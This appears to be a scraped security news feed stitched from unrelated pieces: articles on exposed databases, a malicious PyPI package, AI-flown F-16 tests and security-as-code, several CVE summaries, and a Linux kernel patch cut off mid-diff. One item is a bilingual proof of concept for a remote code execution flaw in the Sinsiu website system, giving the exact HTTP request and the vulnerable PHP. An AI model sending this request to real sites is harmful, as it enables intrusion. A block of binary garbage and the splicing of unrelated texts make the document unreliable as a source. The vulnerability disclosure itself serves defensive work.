By Waqas
In total, 308,000 unsecured databases were found exposing sensitive assets worldwide of which around 90,000 databases have already…
This is a post from HackRead.com Read the original post: US and China Exposed Most Databases Among 308,000 Discovered in 2021

In total, 308,000 unsecured databases were found exposing sensitive assets worldwide of which around 90,000 databases have already been identified in the first quarter of 2022, a dramatically higher number than last year.

In July 2020, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication. Now, the IT security researchers at Group-IB have revealed startling figures about the surge in exposed databases.

Cybersecurity firm Group-IB’s Attack Surface Management team confirmed identifying 308,000 exposed databases in 2021, and over 165,000 of them were identified in the second half of the year.

The Singapore-based firm’s researchers continually scan the IPv4 ecosystem to detect external-facing assets hosting vulnerable or exposed databases, phishing panels, malware, and JS-sniffers. The researchers found 399,200 exposed databases between Q1’21 and Q1’22 and 308,000 in 2021, marking a 16% increase from the second half of 2021.

Most Exposed Databases by Counties (Image: Group-IB)

The severity of misconfigured and exposed databases can be quantified by the fact that earlier this year, Anonymous and its affiliate group of hackers compromised around 90% of Russian cloud databases that were exposed to the public without any security authentication or password.

**Possible Dangers?**

Group-IB claims the probability of such databases being exploited in cyberattacks and costly data breaches is terrifying. The dangers of an exposed database may include a data breach, a follow-up attack on customers/employees whose data was exposed, etc.

In 2021, IBM identified that the average cost of each data breach was more than $4.2 million during the coronavirus pandemic, which was 10% higher than in 2020.

Moreover, the average time required to detect and address the breach also increased to 287 days, which was 170 days in 2020. This is among the main issues, claims Group-IB since timely discovery is essential to prevent threat actors from stealing sensitive data or advancing in the network further.

**Redis Database Management Systems Most Vulnerable to Exposure**

According to Group-IB’s blog post, most of these exposed databases used the Redis database management system, around 37.5% of them. The second most vulnerable was MongoDB with 31%, and the third most vulnerable DMS (database management system) was Elastic, with 29% of the exposed databases using it.

Most Exposed Databases by management system (Image: Group-IB)

According to Group-IB’s report, the largest number of exposed databases that they identified, around 93,600, was located on servers based in the USA, followed by China, which had 54,700 exposed databases, German servers hosted 11,100 and France hosted 9723 of the exposed databases. Around 111 databases were exposed to the web in the UAE and 372 in KSA between Q1’21 and Q2’22.

> A public facing database, an open port, or a cloud instance running vulnerable software are all critical but ultimately avoidable risks. As the complexity of corporate networks keeps growing, all the companies need to have complete visibility over their attack surface.
> 
> Tim Bobak  
> Attack Surface Management Product Lead at Group-IBB

1.  FOX News Exposed 13 Million Sensitive Records Online
2.  Security giant exposed 3TB of sensitive airport & employees data
3.  Kids luxury clothing store Melijoe exposed 200GB of customers’ data
4.  28,000 exposed printers hacked to highlight the lack of printer security
5.  350 million email addresses exposed on a misconfigured AWS S3 bucket

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

US and China Exposed Most Databases Among 308,000 Discovered in 2021

cbs_jpeg_split_fragment in libavcodec/cbs_jpeg.c in FFmpeg 4.1 and 4.2.2 has a heap-based buffer overflow during JPEG_MARKER_SOS handling because of a missing length check.

About Monorail User Guide Release Notes Feedback on Monorail Terms Privacy

CVE-2020-12284: 19734 - oss-fuzz - OSS-Fuzz: Fuzzing the planet

After successful autonomous flight tests in December, the military is ramping up its plans to bring artificial intelligence to the skies.

On the morning of December 1, 2022, a modified F-16 fighter jet codenamed VISTA X-62A took off from Edwards Air Force Base, roughly 60 miles north of Los Angeles. Over the course of a short test flight, the VISTA engaged in advanced fighter maneuver drills, including simulated aerial dogfights, before landing successfully back at base. While this may sound like business as usual for the US’s premier pilot training school—or like scenes lifted straight from _Top Gun: Maverick_—it was not a fighter pilot at the controls but, for the first time on a tactical aircraft, a sophisticated AI.

Overseen by the US Department of Defense, VISTA X-62A undertook 12 AI-led test flights between December 1 and 16, totaling more than 17 hours of autonomous flight time. The breakthrough comes as part of a drive by the United States Air Force Vanguard to develop unmanned combat aerial vehicles. Initiated in 2019, the Skyborg program will continue testing through 2023, with hopes of developing a working prototype by the end of the year. 

The VISTA program is a crucial first step toward these goals, M. Christopher Cotting, director of research at USAF Test Pilot School, explains. “This approach, combined with focused testing on new vehicle systems as they are produced, will rapidly mature autonomy for uncrewed platforms and allow us to deliver tactically relevant capability to our warfighter,” he says. 

With Ukraine’s use of semiautonomous drones, the US military’s first autonomous flight of a Black Hawk helicopter last November, and the successful testing of AI algorithms in US U-2 spy planes in 2020, it’s clear that autonomous combat represents the next front in modern warfare. But just how completely will AI take over our skies, and what does it mean for the human pilots left on the ground?

The VISTA X-62A (short for Variable In-flight Simulation Test Aircraft) has always been ahead of its time. Built in the 1980s and based on an F-16D Block 30 Peace Marble Il, the plane previously held the designation NF-16D and became the US Airforce Test Pilot School’s go-to simulation machine in the early 1990s. A versatile and adaptable training tool boasting open systems architecture, the VISTA can be fitted with software that allows it to mimic the performance characteristics of multiple aircraft, from heavy bombers to ultra-light fighter jets. 

Prior to last year’s autonomous flight tests, the VISTA received a much-needed update in the form of a “model following algorithm” (MFA) and a “system for autonomous control of the simulation” (SACS) from Lockheed Martin’s Skunk Works. Combined with the VISTA Simulation System from defense and aerospace company Calspan Corporation, these updates facilitated an emphasis on autonomy and AI integration. 

Utilizing General Dynamics’s Enterprise-wide Open Systems Architecture (E-OSA) to power the Enterprise Mission Computer version 2 (EMC2, or Einstein Box), the SACS system also integrates advanced sensors, a set of Getac tablet displays in both cockpits, and multilevel security features, all of which enhance VISTA’s capabilities, including its rapid-prototyping advantage, which allows for speedy software updates to meet the accelerating pace of AI development.

During testing in December, a pair of AI programs were fed into the system: the Air Force Research Laboratory’s Autonomous Air Combat Operations (AACO) and the Defense Advanced Research Projects Agency’s (DARPA) Air Combat Evolution (ACE). AACO’s AI agents focused on combat with a single adversary beyond visual range (BVR), while ACE focused on dogfight-style maneuvers with a closer, “visible” simulated enemy.

While VISTA requires a certified pilot in the rear cockpit as backup, during test flights, an engineer trained in the AI systems manned the front cockpit to deal with any technical issues that arose. In the end, these issues were minor. While not able to elaborate on the intricacies, DARPA program manager Lt. Col. Ryan Hefron explains that any hiccups were “to be expected when transitioning from virtual to live.” All in all, it was a significant step toward realizing Skyborg’s aim of getting autonomous aircraft off the ground as soon as possible.

The Department of Defense stresses that AACO and ACE are designed to supplement human pilots, not replace them. In some instances, AI copilot systems could act as a support mechanism for pilots in active combat. With AACO and ACE capable of parsing millions of data inputs per second, and having the ability to take control of the plane at critical junctures, this could be vital in life-or-death situations. For more routine missions that do not require human input, flights could be entirely autonomous, with the nose-section of planes being swapped out when a cockpit is not required for a human pilot.

“We’re not trying to replace pilots, we’re trying to _augment_ them, give them an extra tool,” Cotting says. He draws the analogy of soldiers of bygone campaigns riding into battle on horses. “The horse and the human had to work together,” he says. “The horse can run the trail really well, so the rider doesn’t have to worry about going from point A to B. His brain can be freed up to think bigger thoughts.” For example, Cotting says, a first lieutenant with 100 hours of experience in the cockpit could artificially gain the same edge as a much higher-ranking officer with 1,000 hours of flight experience, thanks to AI augmentation.

For Bill Gray, chief test pilot at the USAF Test Pilot School, incorporating AI is a natural extension of the work he does with human students. “Whenever we \[pilots\] talk to engineers and scientists about the difficulties of training and qualifying AI agents, they typically treat this as a new problem,” he says. “This bothers me, because I have been training and qualifying highly non-linear and unpredictable natural intelligence agents—students—for decades. For me, the question isn’t, ‘Can we train and qualify AI agents?’ It’s, ‘Why can we train and qualify humans, and what can this teach us about doing the same for AI agents?’

Gray believes AI is “not a wonder tool that can solve all of the problems,” but rather that it must be developed in a balanced approach, with built-in safety measures to prevent costly mishaps. An overreliance on AI—a “trust in autonomy”—can be dangerous, Gray believes, pointing out failures in Tesla’s autopilot program despite Tesla asserting the need for the driver to be at the wheel as a backup. Cotting agrees, calling the ability to test AI programs in the VISTA a “risk-reduction plan.” By training AI on conventional systems such as the VISTA X-62—rather than building an entirely new aircraft—automatic limits and, if necessary, safety pilot intervention can help prevent the AI from endangering the aircraft as it learns.

The USAF’s technology is advancing rapidly. This past December, trial flights for ACE and ACCO were often completed within hours of each other, with engineers switching autonomy algorithms onboard the VISTA in minutes, without safety or performance issues, according to Cotting. In one instance, Cotting describes uploading new AI at 7:30 am and the plane being ready to test by 10 am.

“Once you get through the process of connecting an AI to a supersonic fighter, the resulting maneuvering is endlessly fascinating,” says Gray. “We have seen things that make sense, and completely surprising things that make no sense at all. Thanks to our safety systems, programmers are changing their models overnight, and we’re engaging them the next morning. This is unheard of in flight control system development, much less experimentation with unpredictable AI agents.”

Despite these successes, it will take some time before the curriculum at the USAF Test Pilot School undergoes an AI overhaul. Cotting explains that the newness of the AACO and ACE platforms means students will require a greater level of understanding before trying them out in the cockpit of the VISTA. “We’re basically building the bridge as we’re driving over,” Cotting says.

In the meantime, students will undergo a broader test this fall in which they’re exposed to a set of AI and have to figure out how to test it, then execute that test.

As for wider military applications, Cotting says that while he has no visibility into these areas, AI is already ubiquitous in image recognition technology used across the military. While AI-driven tanks may not be on the horizon just yet, the skies, it seems, are set to be home to a new kind of intelligence.

The US Air Force Is Moving Fast on AI-Piloted Fighter Jets

Zip4j through 2.11.2, as used in Threema and other products, does not always check the MAC when decrypting a ZIP archive.

�P�!�R���<��&a�G�U;RhAz�PU������a���}� w#�ʜ�Ȧ� U4I������N�L�9I����Ul�����+�ڊ�+ˢ;�k�}�Zl�0y��b��\_b>�H8�aNFHz����P?�͈7?�wZ�yy�o�; #�V\`�loڪ����a����sϯ�)�2��Kj̹U��#3��\\ο��V�֐K��a��)4�l����@�$g<ن��;$K���as����\`��Yŧf��ϝ���}�叜I�U�k�r�"��W��/%��e����q��-�B���c���<� ���L��W&�'��F椟o+?s\[���dh�

CVE-2023-22899

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2022-24302: Changelog — Paramiko documentation

Sinsiu Sinsiu Enterprise Website System v1.1.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /upload/admin.php?/deal/.

中文： 新秀企业网站系统PHP版存在命令执行漏洞 厂商网站地址：http://www.sinsiu.com/ 影响版本： V1.0 下载地址：https://www.lanzoux.com/i8tj53e V1.1 下载地址：http://www.sinsiu.com/ poc： POST /sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/deal/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: \*/\* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 Origin: http://localhost Connection: close Referer: http://localhost/sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/basic/index.html Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2 cmd=phpinfo detail： 负责过滤参数的函数中并没有处理phpinfo； 造成漏洞的函数： V1.0 ------------------------------------------ if(check\_admin\_login() > 0) { if(isset($global\['dir'\])) { include('admin/module/'.$global\['dir'\].'/deal.php'); } $cmd = post('cmd'); $cmd(); } exit(); -------------------------------------------------- function strict($str) { if(S\_MAGIC\_QUOTES\_GPC) { $str = stripslashes($str); } $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('?','&#63;',$str); $str = str\_replace('%','&#37;',$str); $str = str\_replace(chr(39),'&#39;',$str); $str = str\_replace(chr(34),'&#34;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); return $str; } V1.1 ------------------------------------------- if(file\_exists($path)) { include($path); $cmd = post('cmd'); if(function\_exists($cmd)) { $cmd(); exit(); } } --------------------------------------------- function strict($str) { if(get\_magic\_quotes\_gpc()) { $str = stripslashes($str); } $str = str\_replace('&#','{^}',$str); $str = str\_replace('#','&#35;',$str); $str = str\_replace('--','-&#45;',$str); $str = str\_replace('/\*','/&#42;',$str); $str = str\_replace('\*/','&#42;/',$str); $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('(','&#40;',$str); $str = str\_replace(')','&#41;',$str); $str = str\_replace("'",'&#39;',$str); $str = str\_replace('"','&#34;',$str); $str = str\_replace('\\\\','&#92;',$str); $str = str\_replace('%20','&nbsp;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); $str = str\_replace('{^}','&#',$str); return $str; } English: There is a command execution vulnerability in the PHP version of the sinsiu enterprise website system Manufacturer's website address: http://www.sinsiu.com/ Affected version: V1.0 download address: https://www.lanzoux.com/i8tj53e V1.1 download address: http://www.sinsiu.com/ poc： POST /sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/deal/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: \*/\* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 Origin: http://localhost Connection: close Referer: http://localhost/sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/basic/index.html Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2 cmd=phpinfo detail： phpinfo() is not handled in the function responsible for filtering parameters; Some functions that cause vulnerabilities: V1.0 --------------------------------------------------------- if(check\_admin\_login() > 0) { if(isset($global\['dir'\])) { include('admin/module/'.$global\['dir'\].'/deal.php'); } $cmd = post('cmd'); $cmd(); } exit(); ---------------------------------------------------- function strict($str) { if(S\_MAGIC\_QUOTES\_GPC) { $str = stripslashes($str); } $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('?','&#63;',$str); $str = str\_replace('%','&#37;',$str); $str = str\_replace(chr(39),'&#39;',$str); $str = str\_replace(chr(34),'&#34;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); return $str; } V1.1 ---------------------------------------------------- if(file\_exists($path)) { include($path); $cmd = post('cmd'); if(function\_exists($cmd)) { $cmd(); exit(); } } ---------------------------------------------------------- function strict($str) { if(get\_magic\_quotes\_gpc()) { $str = stripslashes($str); } $str = str\_replace('&#','{^}',$str); $str = str\_replace('#','&#35;',$str); $str = str\_replace('--','-&#45;',$str); $str = str\_replace('/\*','/&#42;',$str); $str = str\_replace('\*/','&#42;/',$str); $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('(','&#40;',$str); $str = str\_replace(')','&#41;',$str); $str = str\_replace("'",'&#39;',$str); $str = str\_replace('"','&#34;',$str); $str = str\_replace('\\\\','&#92;',$str); $str = str\_replace('%20','&nbsp;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); $str = str\_replace('{^}','&#',$str); return $str; }

CVE-2022-36572: try/SinSiuEnterpriseWebsiteSystem at main · BreakALegCml/try

By Waqas
Threat actors are using steganography to hide malicious code in images.
This is a post from HackRead.com Read the original post: GitHub Abused to Distribute Malicious Packages on PyPI in Image Files

The Check Point CloudGuard Spectral Data Science team has detected a new malicious package on the Python Package Index (PyPI) repository capable of hiding code in images using a steganographic technique. The malicious package is infecting users via GitHub’s open-source projects.

The new alert came just days after Python developers were warned of malicious packages swapping out their crypto addresses.

**Detailed Analysis**

According to Check Point, the malicious package was found in the PyPI software repository for the Python programming language and is designed to hide code in images via Steganography, which refers to image code obfuscation.

The actual image used in the attack (Image: Check Point)

The campaign’s modus operandi involves infecting PyPI users through open-source projects revealing that attackers have launched this campaign with thorough planning. It also highlights that PyPI-related obfuscation techniques are continually evolving.

**Malicious Package Details**

Check Point’s blog post noted that the malicious package was named Apicolor. Initially, it appeared just like an in-development package on PyPI, but a deeper probe into its installation script revealed a “strange, non-trivial code section at the beginning,” the advisory read.

(Image: Check Point)

This code manually installed additional requirements and downloaded an image from the web. Then it used the newly installed package for image processing and triggering the processing generated output with the exec command.

An unsuspecting user will access these GitHub open-sourced projects when searching for legit projects on the web and installing them without knowing it fetches a malicious package import.

> “It’s important to note that the code seems to work. In some cases, there are empty malicious packages.”
> 
> Check Point

It is worth noting that this malicious package differs from all previously discovered packages as it can camouflage its capabilities in different ways. Moreover, the way it targets PyPI users are targeted and infected with malicious GitHub imports.

Check Point urges users to use threat code scanners and double-check third-party packages before using them. It is also important to ensure GitHub’s ratings for a particular project aren’t synthetically created.

1.  GitHub: Hackers Stole OAuth Access Tokens
2.  GitHub Repositories Cloned in Supply Chain Attack
3.  Chinese Hackers Hiding Malware in Windows Logo
4.  Infected WAV files install malware, cryptominers on PCs
5.  Hackers spoof commit metadata, create false GitHub repositories

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

GitHub Abused to Distribute Malicious Packages on PyPI in Image Files

An update for opencryptoki is now available for Red Hat Enterprise Linux 8.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-3798: openCryptoki: Soft token does not check if an EC key is valid


RHBA-2021:3054: Red Hat Bug Fix Advisory: opencryptoki bug fix and enhancement update

Google and other firms are adding security configuration to software so cloud applications and services have well-defined security settings — a key component of DevSecOps.

The increased adoption of cloud infrastructure by companies looking to improve agility and support a hybrid workforce has led to more development teams adopting security-as-code as a way to build security into software and products.

Over the past year, for example, Google has pushed security-as-code as a fundamental component of its cloud offerings, identifying in January "software-defined infrastructure" as one of the eight megatrends driving the security of the cloud. Encoding security configuration as code that can be an input into development and deployment processes lets organizations analyze their security configuration, change and redeploy easily, and continuously monitor the state of their security configuration to evaluate whether it matches policies.

The result is analyzable security configuration and continuously verifiable controls, says Phil Venables, vice president at Google and CISO for Google Cloud.

"The great thing about security-as-code is that you know the configuration that you have deployed exactly corresponds to what you had specified and analyzed as meeting your security requirements," he says. "Many breaches out there are not necessarily the result of an unknown risk, but are usually the result of some control that the organization thought they had not being deployed and operating when they needed it the most."

Security-as-code is an extension of the infrastructure-as-code movement that has come about as software-defined networks and systems have become more popular. DevOps teams have adopted infrastructure-as-code as the de facto standard for building and deploying software, containers, and virtual machines, but now companies are betting that the shift to cloud-native infrastructure will make security-as-code a key part of a sustainable approach to security.

**How Security-as-Code Works**  
In 2021, consulting firm McKinsey and Company identified security-as-code as perhaps the only way to secure cloud application and infrastructure at the speed at which modern businesses move.

"Capturing value in the cloud requires most companies to build a transformation engine ... to integrate cloud into business and technologies, drive adoption in priority business domains, and establish the foundational capabilities required to scale cloud usage safely and economically," the consulting firm wrote in a position paper. "SaC is the mechanism for developing foundational capabilities in cloud security and risk management."

Google intends to make the concept much more functional and part of any cloud infrastructure. In November, the company's Cybersecurity Action Team announced a Risk and Compliance as Code (RCaC) solution.

Companies that have embraced DevOps know that repeatable software builds rely on being able to specify the configuration of infrastructure elements — whether software applications, pipeline builds, or containers — as code in a file. This infrastructure-as-code approach allows developers and operations specialists to express and analyze the configuration before it is deployed.

Security-as-code aims to do the same thing for security, in an approach that many have called DevSecOps. Security-as-code expresses the security configuration of a variety of elements, including what security testing should be performed, the criteria for vulnerability scanning, encryption requirements, and access controls.

**How Does it Affect SBOMs?**  
Google sees the current efforts to make software bills of materials (SBOMs) more explicit and functional as a key component of the future of software-as-code. The components of a software program could be analyzed during any build and the policies described in the security-as-code file would be applied. Using a component that is vulnerable to a specific threat, such as Log4j, could stop the build. Other requirements, such as a high level in the Supply Chain Levels for Software Artifacts (SLSA), could also be specified, Google's Venable says.

"This mechanism allows you to start making richer decisions," he says. "This programmability of the environment to enforce security policy is pretty transformational compared to what any of us used to be able to do in traditional on-premise environments."

Google is joined by others blazing a trail into the security-as-code arena. The growing movement to encode security as a configuration file that can be incrementally improved led security firm Tenable Network Security to acquire Accurics, a maker of security-as-code technology.

"It's far more effective to find and fix the issues at the point of creation in code, rather than where they manifest in the cloud," Renaud Deraison, chief technology officer for Tenable Network Security, said in a blog announcing the acquisition. "In this way, we can ensure that what is deployed is secure by default and that any fixes are a simple merge request rather than a patch or operational afterthought."

Not everyone is convinced that security configurations will be ensconced in code anytime soon. While configuration files traveling along with software-defined infrastructure components could bring significant benefits — such as the audit ability and improved change management — companies are still too reactionary to adopt the technology, says Brian Fox, chief technology officer and co-founder of Sonatype, a software-management and security firm.

Software composition analysis (SCA) services that can automate the identification of risky software components — a service that Sonatype provides — provides some of the automated benefits of security-as-code. Most businesses have no idea of even what components make up their software, Fox says.

"We are super early in the adoption cycle with this," he says. "All the reasons that infrastructure-as-code made sense will make sense with security-as-code, but the industry is not quite there yet, because so many people do not have the mechanisms to even do this, never mind doing it as code."

Security-as-Code Gains More Support, but Still Nascent

A flaw was found in the Linux kernel Traffic Control (TC) subsystem. Using a specific networking configuration (redirecting egress packets to ingress using TC action "mirred") a local unprivileged user could trigger a CPU soft lockup (ABBA deadlock) when the transport protocol in use (TCP or SCTP) does a retransmission, resulting in a denial of service condition.

From: Davide Caratti <dcaratti@redhat.com>
To: Jamal Hadi Salim <jhs@mojatatu.com>,
	Cong Wang <xiyou.wangcong@gmail.com>,
	Jiri Pirko <jiri@resnulli.us>, Paolo Abeni <pabeni@redhat.com>
Cc: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>,
	wizhao@redhat.com, netdev@vger.kernel.org
Subject: \[PATCH net\] net/sched: act\_mirred: use the backlog for mirred ingress
Date: Fri, 23 Sep 2022 17:11:12 +0200	\[thread overview\]
Message-ID: <33dc43f587ec1388ba456b4915c75f02a8aae226.1663945716.git.dcaratti@redhat.com> (raw)

William reports kernel soft-lockups on some OVS topologies when TC mirred
"egress-to-ingress" action is hit by local TCP traffic. Indeed, using the
mirred action in egress-to-ingress can easily produce a dmesg splat like:

 ============================================
 WARNING: possible recursive locking detected
 6.0.0-rc4+ #511 Not tainted
 --------------------------------------------
 nc/1037 is trying to acquire lock:
 ffff950687843cb0 (slock-AF\_INET/1){+.-.}-{2:2}, at: tcp\_v4\_rcv+0x1023/0x1160

 but task is already holding lock:
 ffff950687846cb0 (slock-AF\_INET/1){+.-.}-{2:2}, at: tcp\_v4\_rcv+0x1023/0x1160

 other info that might help us debug this:
  Possible unsafe locking scenario:

        CPU0
        ----
   lock(slock-AF\_INET/1);
   lock(slock-AF\_INET/1);

  \*\*\* DEADLOCK \*\*\*

  May be due to missing lock nesting notation

 12 locks held by nc/1037:
  #0: ffff950687843d40 (sk\_lock-AF\_INET){+.+.}-{0:0}, at: tcp\_sendmsg+0x19/0x40
  #1: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: \_\_ip\_queue\_xmit+0x5/0x610
  #2: ffffffff9be072e0 (rcu\_read\_lock\_bh){....}-{1:2}, at: ip\_finish\_output2+0xaa/0xa10
  #3: ffffffff9be072e0 (rcu\_read\_lock\_bh){....}-{1:2}, at: \_\_dev\_queue\_xmit+0x72/0x11b0
  #4: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: netif\_receive\_skb+0x181/0x400
  #5: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: ip\_local\_deliver\_finish+0x54/0x160
  #6: ffff950687846cb0 (slock-AF\_INET/1){+.-.}-{2:2}, at: tcp\_v4\_rcv+0x1023/0x1160
  #7: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: \_\_ip\_queue\_xmit+0x5/0x610
  #8: ffffffff9be072e0 (rcu\_read\_lock\_bh){....}-{1:2}, at: ip\_finish\_output2+0xaa/0xa10
  #9: ffffffff9be072e0 (rcu\_read\_lock\_bh){....}-{1:2}, at: \_\_dev\_queue\_xmit+0x72/0x11b0
  #10: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: netif\_receive\_skb+0x181/0x400
  #11: ffffffff9be07320 (rcu\_read\_lock){....}-{1:2}, at: ip\_local\_deliver\_finish+0x54/0x160

 stack backtrace:
 CPU: 1 PID: 1037 Comm: nc Not tainted 6.0.0-rc4+ #511
 Hardware name: Red Hat KVM, BIOS 1.13.0-2.module+el8.3.0+7353+9de0a3cc 04/01/2014
 Call Trace:
  <TASK>
  dump\_stack\_lvl+0x44/0x5b
  \_\_lock\_acquire.cold.76+0x121/0x2a7
  lock\_acquire+0xd5/0x310
  \_raw\_spin\_lock\_nested+0x39/0x70
  tcp\_v4\_rcv+0x1023/0x1160
  ip\_protocol\_deliver\_rcu+0x4d/0x280
  ip\_local\_deliver\_finish+0xac/0x160
  ip\_local\_deliver+0x71/0x220
  ip\_rcv+0x5a/0x200
  \_\_netif\_receive\_skb\_one\_core+0x89/0xa0
  netif\_receive\_skb+0x1c1/0x400
  tcf\_mirred\_act+0x2a5/0x610 \[act\_mirred\]
  tcf\_action\_exec+0xb3/0x210
  fl\_classify+0x1f7/0x240 \[cls\_flower\]
  tcf\_classify+0x7b/0x320
  \_\_dev\_queue\_xmit+0x3a4/0x11b0
  ip\_finish\_output2+0x3b8/0xa10
  ip\_output+0x7f/0x260
  \_\_ip\_queue\_xmit+0x1ce/0x610
  \_\_tcp\_transmit\_skb+0xabc/0xc80
  tcp\_rcv\_state\_process+0x669/0x1290
  tcp\_v4\_do\_rcv+0xd7/0x370
  tcp\_v4\_rcv+0x10bc/0x1160
  ip\_protocol\_deliver\_rcu+0x4d/0x280
  ip\_local\_deliver\_finish+0xac/0x160
  ip\_local\_deliver+0x71/0x220
  ip\_rcv+0x5a/0x200
  \_\_netif\_receive\_skb\_one\_core+0x89/0xa0
  netif\_receive\_skb+0x1c1/0x400
  tcf\_mirred\_act+0x2a5/0x610 \[act\_mirred\]
  tcf\_action\_exec+0xb3/0x210
  fl\_classify+0x1f7/0x240 \[cls\_flower\]
  tcf\_classify+0x7b/0x320
  \_\_dev\_queue\_xmit+0x3a4/0x11b0
  ip\_finish\_output2+0x3b8/0xa10
  ip\_output+0x7f/0x260
  \_\_ip\_queue\_xmit+0x1ce/0x610
  \_\_tcp\_transmit\_skb+0xabc/0xc80
  tcp\_write\_xmit+0x229/0x12c0
  \_\_tcp\_push\_pending\_frames+0x32/0xf0
  tcp\_sendmsg\_locked+0x297/0xe10
  tcp\_sendmsg+0x27/0x40
  sock\_sendmsg+0x58/0x70
  \_\_sys\_sendto+0xfd/0x170
  \_\_x64\_sys\_sendto+0x24/0x30
  do\_syscall\_64+0x3a/0x90
  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
 RIP: 0033:0x7f11a06fd281
 Code: 00 00 00 00 0f 1f 44 00 00 f3 0f 1e fa 48 8d 05 e5 43 2c 00 41 89 ca 8b 00 85 c0 75 1c 45 31 c9 45 31 c0 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 67 c3 66 0f 1f 44 00 00 41 56 41 89 ce 41 55
 RSP: 002b:00007ffd17958358 EFLAGS: 00000246 ORIG\_RAX: 000000000000002c
 RAX: ffffffffffffffda RBX: 0000555c6e671610 RCX: 00007f11a06fd281
 RDX: 0000000000002000 RSI: 0000555c6e73a9f0 RDI: 0000000000000003
 RBP: 0000555c6e6433b0 R08: 0000000000000000 R09: 0000000000000000
 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000002000
 R13: 0000555c6e671410 R14: 0000555c6e671410 R15: 0000555c6e6433f8
  </TASK>

that is very similar to those observed by William in his setup.
By using netif\_rx() for mirred ingress packets, packets are queued in the
backlog, like it's done in the receive path of "loopback" and "veth", and
the deadlock is not visible anymore. Also add a selftest that can be used
to reproduce the problem / verify the fix.

Fixes: 53592b364001 ("net/sched: act\_mirred: Implement ingress actions")
Reported-by: William Zhao <wizhao@redhat.com>
Suggested-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: Davide Caratti <dcaratti@redhat.com>
---
 net/sched/act\_mirred.c                        |  2 +-
 .../selftests/net/forwarding/tc\_actions.sh    | 29 ++++++++++++++++++-
 2 files changed, 29 insertions(+), 2 deletions(-)

diff --git a/net/sched/act\_mirred.c b/net/sched/act\_mirred.c
index a1d70cf86843..ff965ed2dd9f 100644
--- a/net/sched/act\_mirred.c
+++ b/net/sched/act\_mirred.c
@@ -213,7 +213,7 @@ static int tcf\_mirred\_forward(bool want\_ingress, struct sk\_buff \*skb)
 	if (!want\_ingress)
 		err = tcf\_dev\_queue\_xmit(skb, dev\_queue\_xmit);
 	else
\-		err = netif\_receive\_skb(skb);
+		err = netif\_rx(skb);
 
 	return err;
 }
diff --git a/tools/testing/selftests/net/forwarding/tc\_actions.sh b/tools/testing/selftests/net/forwarding/tc\_actions.sh
index 1e0a62f638fe..6e1b0cc68f7d 100755
--- a/tools/testing/selftests/net/forwarding/tc\_actions.sh
+++ b/tools/testing/selftests/net/forwarding/tc\_actions.sh
@@ -3,7 +3,8 @@
 
 ALL\_TESTS="gact\_drop\_and\_ok\_test mirred\_egress\_redirect\_test \\
 	mirred\_egress\_mirror\_test matchall\_mirred\_egress\_mirror\_test \\
\-	gact\_trap\_test mirred\_egress\_to\_ingress\_test"
+	gact\_trap\_test mirred\_egress\_to\_ingress\_test \\
+	mirred\_egress\_to\_ingress\_tcp\_test"
 NUM\_NETIFS=4
 source tc\_common.sh
 source lib.sh
@@ -198,6 +199,32 @@ mirred\_egress\_to\_ingress\_test()
 	log\_test "mirred\_egress\_to\_ingress ($tcflags)"
 }
 
+mirred\_egress\_to\_ingress\_tcp\_test()
+{
+	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
+
+	RET=0
+	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
+	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \\
+		ip\_proto tcp src\_ip 192.0.2.1 dst\_ip 192.0.2.2 \\
+			action ct commit nat src addr 192.0.2.2 pipe \\
+			action ct clear pipe \\
